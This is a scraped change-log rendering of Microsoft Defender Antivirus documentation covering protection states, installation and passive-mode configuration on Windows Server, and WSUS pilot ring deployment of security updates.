-| Protection | Microsoft Defender Antivirus <br/>(*Active mode*) | Microsoft Defender Antivirus <br/>(*Passive mode*) | Microsoft Defender Antivirus <br/>(*Disabled or uninstalled*) |
-|:|:|:|:|:|
-| [Real-time protection](configure-real-time-protection-microsoft-defender-antivirus.md) | Yes | [See note 1](#notes-about-protection-states) | No |
-| [Cloud-delivered protection](enable-cloud-protection-microsoft-defender-antivirus.md) | Yes | No | No |
-| [Network protection](network-protection.md) | Yes | No | No |
-| [Attack surface reduction rules](attack-surface-reduction.md) | Yes | No | No |
-| [File scanning and detection information](review-scan-results-microsoft-defender-antivirus.md) | Yes | Yes <br/>[See note 2](#notes-about-protection-states) | No |
-| [Threat remediation](configure-remediation-microsoft-defender-antivirus.md) | Yes | [See note 3](#notes-about-protection-states) | No |
-| [Security intelligence updates](microsoft-defender-antivirus-updates.md) | Yes | Yes <br/>[See note 4](#notes-about-protection-states) | No |
-| [Data Loss Prevention](../../compliance/endpoint-dlp-learn-about.md) | Yes | Yes | No |
-| [Controlled folder access](controlled-folders.md) | Yes |No | No |
-| [Web content filtering](web-content-filtering.md) | Yes | [See note 5](#notes-about-protection-states) | No |
-| [Device control](device-control-report.md) | Yes | Yes | No |
-| [PUA protection](detect-block-potentially-unwanted-apps-microsoft-defender-antivirus.md) | Yes | No | No |
-
-### Notes about protection states
-
-1. In general, when Microsoft Defender Antivirus is in passive mode, real-time protection doesn't provide any blocking or enforcement, even though it's enabled and in passive mode.
-
-1. When Microsoft Defender Antivirus is in passive mode, scans aren't scheduled. If scans *are* scheduled in your configuration, the schedule is ignored. However, every 30 days (default number of days) a quick catchup scan continues to occur unless "Turn on catch-up quick scan" is set to disabled. Scan tasks that are set up in Windows Task Scheduler continue to run according to their schedule. If you have scheduled tasks, you can remove them, if preferred.
-3. When Microsoft Defender Antivirus is in passive mode, it doesn't remediate threats. However, [Endpoint detection and response (EDR) in block mode](edr-in-block-mode.md) can remediate threats. In this case, you might see alerts showing Microsoft Defender Antivirus as a source, even when Microsoft Defender Antivirus is in passive mode.
-
-4. The security intelligence update cadence is controlled by Windows Update settings only. Defender-specific update schedulers (daily/weekly at specific time, interval-based) settings only work when Microsoft Defender Antivirus is in active mode. They're ignored in passive mode.
-
-5. When Microsoft Defender Antivirus is in passive mode, web content filtering only works with the Microsoft Edge browser.
-
-> [!IMPORTANT]
-> - [Endpoint data loss prevention](/microsoft-365/compliance/endpoint-dlp-learn-about) protection continues to operate normally when Microsoft Defender Antivirus is in either active or passive mode.
->
-> - Don't disable, stop, or modify any of the associated services that are used by Microsoft Defender Antivirus, Defender for Endpoint, or the Windows Security app. This recommendation includes the *wscsvc*, *SecurityHealthService*, *MsSense*, *Sense*, *WinDefend*, or *MsMpEng* services and processes. Manually modifying these services can cause severe instability on your devices and can make your network vulnerable. Disabling, stopping, or modifying those services can also cause problems when using non-Microsoft antivirus solutions and how their information is displayed in the [Windows Security app](microsoft-defender-security-center-antivirus.md).
->
-> - In Defender for Endpoint, you can turn EDR in block mode on, even if Microsoft Defender Antivirus isn't your primary antivirus solution. EDR in block mode detects and remediate malicious items that are found on the device (post breach). To learn more, see [EDR in block mode](edr-in-block-mode.md).
-
-## How to confirm the state of Microsoft Defender Antivirus
-
-You can use one of several methods to confirm the state of Microsoft Defender Antivirus. You can:
--- [Use the Windows Security app to identify your antivirus app](#use-the-windows-security-app-to-identify-your-antivirus-app).-- [Use Task Manager to confirm that Microsoft Defender Antivirus is running](#use-task-manager-to-confirm-that-microsoft-defender-antivirus-is-running).-- [Use Windows PowerShell to confirm that Microsoft Defender Antivirus is running](#use-windows-powershell-to-confirm-that-microsoft-defender-antivirus-is-running).-- [Use Windows PowerShell to confirm that antivirus protection is running](#use-windows-powershell-to-confirm-that-antivirus-protection-is-running).-
-> [!IMPORTANT]
-> Beginning with [platform version 4.18.2208.0 and later](microsoft-defender-antivirus-updates.md#monthly-platform-and-engine-versions): If a server has been onboarded to Microsoft Defender for Endpoint, the "Turn off Windows Defender" [group policy](configure-endpoints-gp.md#update-endpoint-protection-configuration) setting no longer completely disables Windows Defender Antivirus on Windows Server 2012 R2 and later. Instead, it place Microsoft Defender Antivirus into passive mode. In addition, the [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) allows a switch to active mode, but not to passive mode.
->
-> - If "Turn off Windows Defender" is already in place before onboarding to Microsoft Defender for Endpoint, Microsoft Defender Antivirus remains disabled.
-> - To switch Microsoft Defender Antivirus to passive mode, even if it was disabled before onboarding, you can apply the [ForceDefenderPassiveMode configuration](switch-to-mde-phase-2.md#set-microsoft-defender-antivirus-to-passive-mode-on-windows-server) with a value of `1`. To place it into active mode, switch this value to `0` instead.
->
-> Note the modified logic for `ForceDefenderPassiveMode` when tamper protection is enabled: Once Microsoft Defender Antivirus is toggled to active mode, tamper protection prevents it from going back into passive mode even when `ForceDefenderPassiveMode` is set to `1`.
-
-### Use the Windows Security app to identify your antivirus app
-
-1. On a Windows device, open the Windows Security app.
-
-2. Select **Virus & threat protection**.
-
-3. Under **Who's protecting me?** select **Manage providers**.
-
-4. On the **Security providers** page, under **Antivirus**, you should see **Microsoft Defender Antivirus is turned on**.
-
-### Use Task Manager to confirm that Microsoft Defender Antivirus is running
-
-1. On a Windows device, open the Task Manager app.
-
-2. Select the **Details** tab.
-
-3. Look for **MsMpEng.exe** in the list.
-
-### Use Windows PowerShell to confirm that Microsoft Defender Antivirus is running
-
-> [!NOTE]
-> Use this procedure only to confirm whether Microsoft Defender Antivirus is running on an endpoint.
-
-1. On a Windows device, open Windows PowerShell.
-
-2. Run the following PowerShell cmdlet: `Get-Process`.
-
-3. Review the results. You should see **MsMpEng.exe** if Microsoft Defender Antivirus is enabled.
-
-### Use Windows PowerShell to confirm that antivirus protection is running
-
-> [!NOTE]
-> Use this procedure only to confirm whether antivirus protection is enabled on an endpoint.
-
-1. On a Windows device, open Windows PowerShell.
-
-2. Run following PowerShell cmdlet: `Get-MpComputerStatus | select AMRunningMode`.
-
-3. Review the results. You should see **Normal**, **Passive**, or **EDR Block Mode** if antivirus protection is enabled on the endpoint.
-
-> [!NOTE]
-> Note that this procedure is only to confirm whether antivirus protection is enabled on an endpoint.
-
-## More details about Microsoft Defender Antivirus states
-
-The following sections describe what to expect when Microsoft Defender Antivirus is:
--- [In active mode](#active-mode)-- [In passive mode, or when EDR in block mode is turned on](#passive-mode-or-edr-block-mode)-- [Disabled or uninstalled](#disabled-or-uninstalled)-
-### Active mode
-
-In active mode, Microsoft Defender Antivirus is used as the antivirus app on the machine. Settings that are configured by using Configuration Manager, Group Policy, Microsoft Intune, or other management products apply. Files are scanned, threats are remediated, and detection information is reported in your configuration tool (such as in the Microsoft Intune admin center or the Microsoft Defender Antivirus app on the endpoint).
-
-### Passive mode or EDR Block mode
-
-In passive mode, Microsoft Defender Antivirus isn't used as the antivirus app, and threats aren't* remediated by Microsoft Defender Antivirus. However, [Endpoint detection and response (EDR) in block mode](edr-in-block-mode.md) can remediate threats. Files are scanned by EDR, and reports are provided for threat detections that are shared with the Defender for Endpoint service. You might see alerts showing Microsoft Defender Antivirus as a source, even when Microsoft Defender Antivirus is in passive mode.
-
-When Microsoft Defender Antivirus is in passive mode, you can still [manage updates for Microsoft Defender Antivirus](microsoft-defender-antivirus-updates.md); however, you can't move Microsoft Defender Antivirus into active mode if your devices have a non-Microsoft antivirus product that is providing real-time protection from malware.
-
-**Make sure to get your antivirus and antimalware updates, even if Microsoft Defender Antivirus is running in passive mode**. See [Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md). Passive mode is only supported on Windows Server 2012 R2 & 2016 when the machine is onboarded using the [modern, unified solution](/microsoft-365/security/defender-endpoint/configure-server-endpoints).
-
-### Disabled or uninstalled
-
-When disabled or uninstalled, Microsoft Defender Antivirus isn't used as the antivirus app. Files aren't scanned and threats aren't remediated. Disabling or uninstalling Microsoft Defender Antivirus isn't recommended in general; if possible, keep Microsoft Defender Antivirus in passive mode if you're using a non-Microsoft antimalware/antivirus solution.
-
-In cases where Microsoft Defender Antivirus is disabled automatically, it can be re-enabled automatically if the non-Microsoft antivirus/antimalware product expires, is uninstalled, or otherwise stops providing real-time protection from viruses, malware, or other threats. The automatic re-enabling of Microsoft Defender Antivirus helps to ensure that antivirus protection is maintained on your endpoints.
-
-You might also use [limited periodic scanning](limited-periodic-scanning-microsoft-defender-antivirus.md), which works with the Microsoft Defender Antivirus engine to periodically check for threats if you're using a non-Microsoft antivirus app. |
-
-## What about non-Windows devices?
-
- If you're looking for Antivirus related information for other platforms, see:
--- [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)-- [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)-- [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)-- [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)-- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)-- [Configure Defender for Endpoint on Android features](android-configure.md)-- [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)-
-## See also
--- [Microsoft Defender Antivirus on Windows clients](microsoft-defender-antivirus-in-windows-10.md)-- [EDR in block mode](edr-in-block-mode.md)-- [Learn about Endpoint data loss prevention](/microsoft-365/compliance/endpoint-dlp-learn-about)-
security Microsoft Defender Antivirus On Windows Server https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-on-windows-server.md
- Title: Microsoft Defender Antivirus on Windows Server
-description: Learn how to enable and configure Microsoft Defender Antivirus on Windows Server 2016, Windows Server 2019, and Windows Server 2022.
------- Previously updated : 04/03/2024--- m365-security-- tier2-- m365initiative-defender-endpoint-- mde-ngp--
-# Microsoft Defender Antivirus on Windows Server
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-Microsoft Defender Antivirus is available in the following editions/versions of Windows Server:
--- Windows Server 2022-- Windows Server 2019-- Windows Server, version 1803 or later-- Windows Server 2016-- Windows Server 2012 R2 (Requires Microsoft Defender for Endpoint)-
-## Setting up Microsoft Defender Antivirus on Windows Server
-
-The process of setting up and running Microsoft Defender Antivirus on Windows Server includes the following steps:
-
-1. [Enable the interface](#enable-the-user-interface-on-windows-server).
-2. [Install Microsoft Defender Antivirus](#install-microsoft-defender-antivirus-on-windows-server).
-3. [Verify Microsoft Defender Antivirus is running](#verify-microsoft-defender-antivirus-is-running).
-4. [Update your antimalware Security intelligence](#update-antimalware-security-intelligence).
-5. (As needed) [Submit samples](#submit-samples).
-6. (As needed) [Configure automatic exclusions](#configure-automatic-exclusions).
-7. (Only if necessary) [Set Windows Server to passive mode](#passive-mode-and-windows-server).
-
-## Enable the user interface on Windows Server
-
-> [!IMPORTANT]
-> If you're using Windows Server 2012 R2, see [Options to install Microsoft Defender for Endpoint](configure-server-endpoints.md#options-to-install-the-microsoft-defender-for-endpoint-packages).
-
-By default, Microsoft Defender Antivirus is installed and functional on Windows Server. Sometimes, the user interface (GUI) is installed by default. The GUI isn't required; you can use PowerShell, Group Policy, or other methods to manage Microsoft Defender Antivirus. However, many organizations prefer to use the GUI for Microsoft Defender Antivirus. To install the GUI, use one of the procedures in the following table:
-
-| Procedure | What to do |
-|:|:|
-| Turn on the GUI using the Add Roles and Features Wizard | 1. See [Install roles, role services, and features by using the add Roles and Features Wizard](/windows-server/administration/server-manager/install-or-uninstall-roles-role-services-or-features#install-roles-role-services-and-features-by-using-the-add-roles-and-features-wizard), and use the **Add Roles and Features Wizard**. <br/><br/>2. When you get to the **Features** step of the wizard, under **Windows Defender Features**, select the **GUI for Windows Defender** option. |
-| Turn on the GUI using PowerShell | 1. On your Windows Server, open Windows PowerShell as an administrator. <br/><br/>2. Run the following PowerShell cmdlet: `Install-WindowsFeature -Name Windows-Defender-GUI` |
-
-For more information, see [Getting Started with PowerShell](/powershell/scripting/learn/ps101/01-getting-started).
-
-## Install Microsoft Defender Antivirus on Windows Server
-
-If you need to install or reinstall Microsoft Defender Antivirus on Windows Server, use one of the procedures in the following table:
-
-| Procedure | What to do |
-|:|:|
-| Use the Add Roles and Features Wizard to install Microsoft Defender Antivirus | 1. See [Install or Uninstall Roles, Role Services, or Features](/windows-server/administration/server-manager/install-or-uninstall-roles-role-services-or-features#install-roles-role-services-and-features-by-using-the-add-roles-and-features-wizard), and use the **Add Roles and Features Wizard**. <br/><br/>2. When you get to the **Features** step of the wizard, select the Microsoft Defender Antivirus option. Also select the **GUI for Windows Defender** option. |
-| Use PowerShell to install Microsoft Defender Antivirus | 1. On your Windows Server, open Windows PowerShell as an administrator. <br/><br/>2. Run the following PowerShell cmdlet: `Install-WindowsFeature -Name Windows-Defender` |
-
-> [!NOTE]
-> Event messages for the antimalware engine included with Microsoft Defender Antivirus can be found in [Microsoft Defender Antivirus Events](/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus/).
-
-## Verify Microsoft Defender Antivirus is running
-
-After you've installed (or reinstalled) Microsoft Defender Antivirus, your next step is to verify that it's running. Use the PowerShell cmdlets in the following table:
-
-| Procedure | PowerShell cmdlet |
-|:|:|
-| Verify that Microsoft Defender Antivirus is running | `Get-Service -Name windefend` |
-| Verify that firewall protection is turned on | `Get-Service -Name mpssvc` |
-
-As an alternative to PowerShell, you can use Command Prompt to verify that Microsoft Defender Antivirus is running. To do that, run the following command from a command prompt:
-
-```cmd
-sc query Windefend
-```
-
-The `sc query` command returns information about the Microsoft Defender Antivirus service. When Microsoft Defender Antivirus is running, the `STATE` value displays `RUNNING`.
-
-To view all the services that aren't running, run the following PowerShell cmdlet:
-
-```cmd
-sc query state= all
-```
-
-## Update antimalware Security intelligence
-
-> [!IMPORTANT]
-> Beginning with [platform version 4.18.2208.0 and later](microsoft-defender-antivirus-updates.md#monthly-platform-and-engine-versions): If a server has been onboarded to Microsoft Defender for Endpoint, the "Turn off Windows Defender" [group policy](configure-endpoints-gp.md#update-endpoint-protection-configuration) setting will no longer completely disable Windows Defender Antivirus on Windows Server 2012 R2 and later. Instead, it will place it into passive mode. In addition, the [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) feature will allow a switch to active mode but not to passive mode.
->
-> - If "Turn off Windows Defender" is already in place before onboarding to Microsoft Defender for Endpoint, there will be no change and Defender Antivirus will remain disabled.
-> - To switch Defender Antivirus to passive mode, even if it was disabled before onboarding, you can apply the [ForceDefenderPassiveMode configuration](switch-to-mde-phase-2.md#set-microsoft-defender-antivirus-to-passive-mode-on-windows-server) with a value of `1`. To place it into active mode, switch this value to `0` instead.
->
-> Note the modified logic for `ForceDefenderPassiveMode` when tamper protection is enabled: Once Microsoft Defender Antivirus is toggled to active mode, tamper protection will prevent it from going back into passive mode even when `ForceDefenderPassiveMode` is set to `1`.
-
-To get your regular security intelligence updates, the Windows Update service must be running. If you use an update management service, like Windows Server Update Services (WSUS), make sure Microsoft Defender Antivirus Security intelligence updates are approved for the computers you manage.
-
-By default, Windows Update doesn't download and install updates automatically on Windows Server 2019 or Windows Server 2022, or Windows Server 2016. You can change this configuration by using one of the following methods:
-
-| Method | Description |
-|||
-| **Windows Update** in Control Panel | **Install updates automatically** results in all updates being automatically installed, including Windows Defender Security intelligence updates. <br/><br/> **Download updates but let me choose whether to install them** allows Windows Defender to download and install Security intelligence updates automatically, but other updates aren't automatically installed. |
-| **Group Policy** | You can set up and manage Windows Update by using the settings available in Group Policy, in the following path: **Administrative Templates\Windows Components\Windows Update\Configure Automatic Updates** |
-| The **AUOptions** registry key | The following two values allow Windows Update to automatically download and install Security intelligence updates: <br/><br/> **4** - **Install updates automatically**. This value results in all updates being automatically installed, including Windows Defender Security intelligence updates. <br/><br/> **3** - **Download updates but let me choose whether to install them**. This value allows Windows Defender to download and install Security intelligence updates automatically, but other updates aren't automatically installed. |
-
-To ensure that protection from malware is maintained, enable the following
--- Windows Error Reporting service-- Windows Update service-
-The following table lists the services for Microsoft Defender Antivirus and the dependent services.
-
-| Service Name | File Location | Description |
-||||
-| Windows Defender Service (WinDefend) | `C:\Program Files\Windows Defender\MsMpEng.exe` | This service is the main Microsoft Defender Antivirus service that needs to be running always.|
-| Windows Error Reporting Service (Wersvc) | `C:\WINDOWS\System32\svchost.exe -k WerSvcGroup` | This service sends error reports back to Microsoft. |
-| Windows Firewall (MpsSvc) | `C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork` | We recommend keeping the Windows Firewall service enabled. |
-| Windows Update (Wuauserv) | `C:\WINDOWS\system32\svchost.exe -k netsvcs`| Windows Update is needed to get Security intelligence updates and antimalware engine updates |
-
-## Submit samples
-
-Sample submission allows Microsoft to collect samples of potentially malicious software. To help provide continued and up-to-date protection, Microsoft researchers use these samples to analyze suspicious activities and produce updated antimalware Security intelligence. We collect program executable files, such as .exe files and .dll files. We don't collect files that contain personal data, like Microsoft Word documents and PDF files.
-
-### Submit a file
-
-1. Review the [submission guide](/windows/security/threat-protection/intelligence/submission-guide).
-
-2. Visit the [sample submission portal](https://www.microsoft.com/wdsi/filesubmission), and submit your file.
-
-### Enable automatic sample submission
-
-To enable automatic sample submission, start a Windows PowerShell console as an administrator, and set the **SubmitSamplesConsent** value data according to one of the following settings:
-
-|Setting|Description|
-|||
-| **0** - **Always prompt** | The Microsoft Defender Antivirus service prompts you to confirm submission of all required files. This setting is the default for Microsoft Defender Antivirus, but isn't recommended for installations on Windows Server 2016 or 2019, or Windows Server 2022 without a GUI. |
-| **1** - **Send safe samples automatically** | The Microsoft Defender Antivirus service sends all files marked as "safe" and prompts for the remainder of the files. |
-| **2** - **Never send** | The Microsoft Defender Antivirus service doesn't prompt and doesn't send any files. |
-| **3** - **Send all samples automatically** | The Microsoft Defender Antivirus service sends all files without a prompt for confirmation. |
-
-> [!NOTE]
-> This option is not available for Windows Server 2012 R2.
-
-## Configure automatic exclusions
-
-To help ensure security and performance, certain exclusions are automatically added based on the roles and features you install when using Microsoft Defender Antivirus on Windows Server 2016 or 2019, or Windows Server 2022.
-
-See [Configure exclusions in Microsoft Defender Antivirus on Windows Server](configure-server-exclusions-microsoft-defender-antivirus.md).
-
-## Passive mode and Windows Server
-
-If you're using a non-Microsoft antivirus product as your primary antivirus solution on Windows Server, you must set Microsoft Defender Antivirus to passive mode or disabled mode manually. If your Windows Server endpoint is onboarded to Microsoft Defender for Endpoint, you can set Microsoft Defender Antivirus to passive mode. If you're not using Microsoft Defender for Endpoint, set Microsoft Defender Antivirus to disabled mode.
-
-> [!TIP]
-> See [Microsoft Defender Antivirus compatibility with other security products](microsoft-defender-antivirus-compatibility.md).
-
-The following table describes methods to set Microsoft Defender Antivirus to passive mode, disable Microsoft Defender Antivirus, and uninstall Microsoft Defender Antivirus:
-
-| Procedure | Description |
-|||
-| Set Microsoft Defender Antivirus to passive mode by using a registry key | Set the `ForceDefenderPassiveMode` registry key as follows: <br/>- Path: `HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection` <br/>- Name: `ForceDefenderPassiveMode` <br/>- Type: `REG_DWORD` <br/>- Value: `1` |
-| Turn off the Microsoft Defender Antivirus user interface using PowerShell | Open Windows PowerShell as an administrator, and run the following PowerShell cmdlet: `Uninstall-WindowsFeature -Name Windows-Defender-GUI`
-| Disable Microsoft Defender Antivirus real-time protection using PowerShell | Use the following PowerShell cmdlet: `Set-MpPreference -DisableRealtimeMonitoring $true` |
-| Disable Microsoft Defender Antivirus using the Remove Roles and Features wizard | See [Install or Uninstall Roles, Role Services, or Features](/windows-server/administration/server-manager/install-or-uninstall-roles-role-services-or-features#remove-roles-role-services-and-features-by-using-the-remove-roles-and-features-wizard), and use the **Remove Roles and Features Wizard**. <br/><br/>When you get to the **Features** step of the wizard, clear the **Windows Defender Features** option. <br/><br/> If you clear **Windows Defender** by itself under the **Windows Defender Features** section, you're prompted to remove the interface option **GUI for Windows Defender**.<br/><br/>Microsoft Defender Antivirus runs normally without the user interface, but the user interface can't be enabled if you disable the core **Windows Defender** feature. |
-| Uninstall Microsoft Defender Antivirus using PowerShell | Use the following PowerShell cmdlet: `Uninstall-WindowsFeature -Name Windows-Defender` |
-| Disable Microsoft Defender Antivirus using Group Policy | In your Local Group Policy Editor, navigate to **Administrative Template** > **Windows Component** > **Endpoint Protection** > **Disable Endpoint Protection**, and then select **Enabled** > **OK**. |
-
-For more information, see [Working with Registry Keys](/powershell/scripting/samples/working-with-registry-keys).
-
-### Are you using Windows Server 2012 R2 or Windows Server 2016?
-
-If your Windows Server is onboarded to Microsoft Defender for Endpoint, you can run Microsoft Defender Antivirus in passive mode on Windows Server 2012 R2 and Windows Server 2016. See the following articles:
--- [Options to install Microsoft Defender for Endpoint](configure-server-endpoints.md#options-to-install-the-microsoft-defender-for-endpoint-packages)--- [Microsoft Defender Antivirus compatibility with other security products](microsoft-defender-antivirus-compatibility.md)-
-### What happens if a non-Microsoft antivirus product is uninstalled?
-
-If a non-Microsoft antivirus product was installed on Windows Server, Microsoft Defender Antivirus was probably set to passive mode. When the non-Microsoft antivirus product is uninstalled, Microsoft Defender Antivirus should switch to active mode automatically. However, that might not occur on certain versions of Windows Server, such as Windows Server 2016. Use the following procedure to check the status of Microsoft Defender Antivirus, and if necessary, set it to active mode:
-
-1. Check the status of Microsoft Defender Antivirus by following the guidance in [Verify Microsoft Defender Antivirus is running](#verify-microsoft-defender-antivirus-is-running) (in this article).
-
-2. If necessary, set Microsoft Defender Antivirus to active mode manually by following these steps:
-
- 1. On your Windows Server device, open Registry Editor as an administrator.
-
- 2. Go to `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection`.
-
- 3. Set or define a `REG_DWORD` entry called `ForceDefenderPassiveMode`, and set its value to `0`.
-
- 4. Reboot the device.
-
-> [!TIP]
-> If you still need help, see the following troubleshooting items:
->
-> - [Microsoft Defender Antivirus seems to be stuck in passive mode](/microsoft-365/security/defender-endpoint/switch-to-mde-troubleshooting#microsoft-defender-antivirus-seems-to-be-stuck-in-passive-mode).
-> - [I'm having trouble re-enabling Microsoft Defender Antivirus on Windows Server 2016](/microsoft-365/security/defender-endpoint/switch-to-mde-troubleshooting#i-am-having-trouble-re-enabling-microsoft-defender-antivirus-on-windows-server-2016).
-
-## See also
--- [Microsoft Defender Antivirus in Windows](microsoft-defender-antivirus-windows.md)-- [Microsoft Defender Antivirus compatibility with other security products](microsoft-defender-antivirus-compatibility.md)-- [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)-
security Microsoft Defender Antivirus Pilot Ring Deployment Group Policy Wsus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-pilot-ring-deployment-group-policy-wsus.md
- Title: Pilot ring deployment using Group Policy and Windows Server Update Services
-description: Microsoft Defender Antivirus is an enterprise endpoint security platform that helps defend against advanced persistent threats. This article provides information about how to use a ring deployment method to update your Microsoft Defender Antivirus pilot clients using Group Policy and Windows Server Update Services (WSUS).
------- m365-security-- tier1-- mde-ngp--- Previously updated : 07/21/2023--
-# Microsoft Defender Antivirus pilot ring deployment using Group Policy and Windows Server Update Services
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-- Windows Server-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.
-
-> [!TIP]
-> Microsoft Defender for Endpoint is available in two plans, Defender for Endpoint Plan 1 and Plan 2. A new Microsoft Defender Vulnerability Management add-on is now available for Plan 2.
-
-### Resources
-
-The following resources provide information for using and managing Windows Server Update Services (WSUS).
-- [Deploy Windows Defender definition updates using WSUS - Configuration Manager](/troubleshoot/mem/configmgr/update-management/deploy-definition-updates-using-wsus)-- [Windows Server Update Services Help](/previous-versions/orphan-topics/ws.11/dn343567(v=ws.11)?redirectedfrom=MSDN)-
-## Setting up the pilot environment
-
-This section provides information about setting up the pilot (UAT/Test/QA) environment using Group Policy and Windows Server Update Services (WSUS).
--
-> [!NOTE]
-> Security intelligence update (SIU) is equivalent to signature updates, which is the same as definition updates.
-
-On about 10-500* Windows and/or Windows Server systems, depending on how many total systems that you all have.
-
-> [!NOTE]
-> If you have a Citrix environment, include at least one Citrix VM (non-persistent) and/or (persistent)
-
-1. Launch the **Windows Server Update Services Configuration Wizard**.
-
-1. On the **Before You Begin** page, review the preliminary information and attend to any configuration or credential matters, and then select **Next**.
-
-1. On the **Microsoft Update Improvement Program** page, if you would like to participate in the program, select **Yes, I would like to join the Microsoft Update Improvement Program**. Select **Next**.
-
-1. On the **Choose Upstream Server** page, select **Synchronize from Microsoft Update** and then select **Next**.
-
-1. On the **Specify Proxy Server** page, select **Next**.
-
-1. On the **Choose Languages** page, select **Download updates only in these languages**. Select the update languages that you want to download, and then select **Next**
-
-1. On the **Choose Products** page, scroll down to **Forefront**, select **Forefront Client Security** and **System Center Endpoint Protection** This is shown in the following figure.
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-choose-products-av.png" alt-text="Screenshot that shows a screen capture of the WSUS configuration wizard Choose Products page." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-choose-products-av.png":::
-
- While still on the **Choose Products** page, scroll down to **Windows** and select **Microsoft Defender Antivirus**.
-
-1. Select **Next**. On the **Choose Classification** page, select: **critical Updates**, **Definition Updates**, and **Security Updates**, and then select **Next**.
-
-1. On the **Configure Sync Schedule** page, do the following:
-
- | In: | Change: |
- |:|:|
- | **Synchronize automatically** | select (enable) |
- | **First synchronization** | Set time to _5:00:00 AM_ |
- | **Synchronizations per day** | Set to _1_ |
-
-1. Select **Next**. On the **Finished** page, select **Next**.
-
-1. On the **What's next** page, select **Finish**.
-
-The Windows Server Update Services Configuration Wizard is complete.
-
-1. Open the **Update Services** snap-in console, and navigate to **YR2K19**. The console is shown in the following figure.
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-update-service-synch.png" alt-text="Screenshot that shows a screen capture of the Update Services snap-in console with YR2K19 shown." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-update-service-synch.png":::
-
-1. When synchronization is complete, you can see how many products and classifications have been added in the last 30 days. Check to ensure the status for **Last synchronization result** indicates _Succeeded_. You may see a warning indicating **"Your WSUS server currently shows that no computers are registered to receive updates"**. This warning is normal at this point of the deployment configuration process.
-
-#### View update details
-
-1. In the **Update Services** console, in the navigation tree, go to > **Update Services** > **YR2K19** > **Updates** > **All Updates**.
-1. In the **Actions** column, select **Search**. **Search** opens. In **Text**, type _defender_, and press _ENTER_. The results field under **Update Title** lists updates that include the word **Defender** in the title. For example _Windows Defender_ and _Microsoft Defender Antivirus_ updates for _Platform_, _Engine_, and _Intelligence_. Example results are shown in the next image.
-
- See [ Viewing and Managing Updates](/windows-server/administration/windows-server-update-services/manage/viewing-and-managing-updates).
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-update-service-search-defender.png" alt-text="Screenshot that shows a screen capture of the Update Services for Microsoft Defender Antivirus." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-update-service-search-defender.png":::
-
-1. In the **Search** dialog, under **Update Title**, double-click one of the listed KB items. One of two things happens:
-
- - If you don't have **Microsoft Report Viewer 2012 Redistributable** installed, the following error message appears:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-report-viewer-error.png" alt-text="Screenshot that shows a screen capture of an error message indicating the Microsoft Report Viewer 2012 Redistributable isn't installed." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-report-viewer-error.png":::
-
- Follow the link in the error message to install the Microsoft Report Viewer 2012 Redistributable before proceeding to the next numbered step of this procedure.
-
- - If **Microsoft Report Viewer 2012 Redistributable** installed, **Update Report for YR2k19** opens, presenting a report with information related to the KB you previously selected. An example report is shown in the following image.
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-report-viewer-kb-update-info.png" alt-text="Screenshot that shows a screen capture with details about a KB update reported in **Update Report for Yr2k19**." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-report-viewer-kb-update-info.png":::
-
- To learn more about the different Microsoft Defender Antivirus Update channels, see [Manage the gradual rollout process for Microsoft Defender updates](manage-gradual-rollout.md)
-
-#### To find out which Platform Update version is the Current Channel (Broad)
-
-1. Go to the [Microsoft Update Catalog](https://www.catalog.update.microsoft.com/Search.aspx?q=KB4052623). (_This link automatically loads a search filtered to KB4052623_)
-1. Search for a KB by name. For example, In the search box, type _KB4052623_, and then select **Search**.
-
- For example, on April 11, 2023, the latest production version is **4.18.2302.7**, where **23** == _2023_, **02** == _February_, and **.7** is the _minor revision_.
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-report-viewer-kb-search.png" alt-text="Screenshot that shows a screen capture of the results from a Microsoft Update Catalog search for KB4052623." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-report-viewer-kb-search.png":::
-
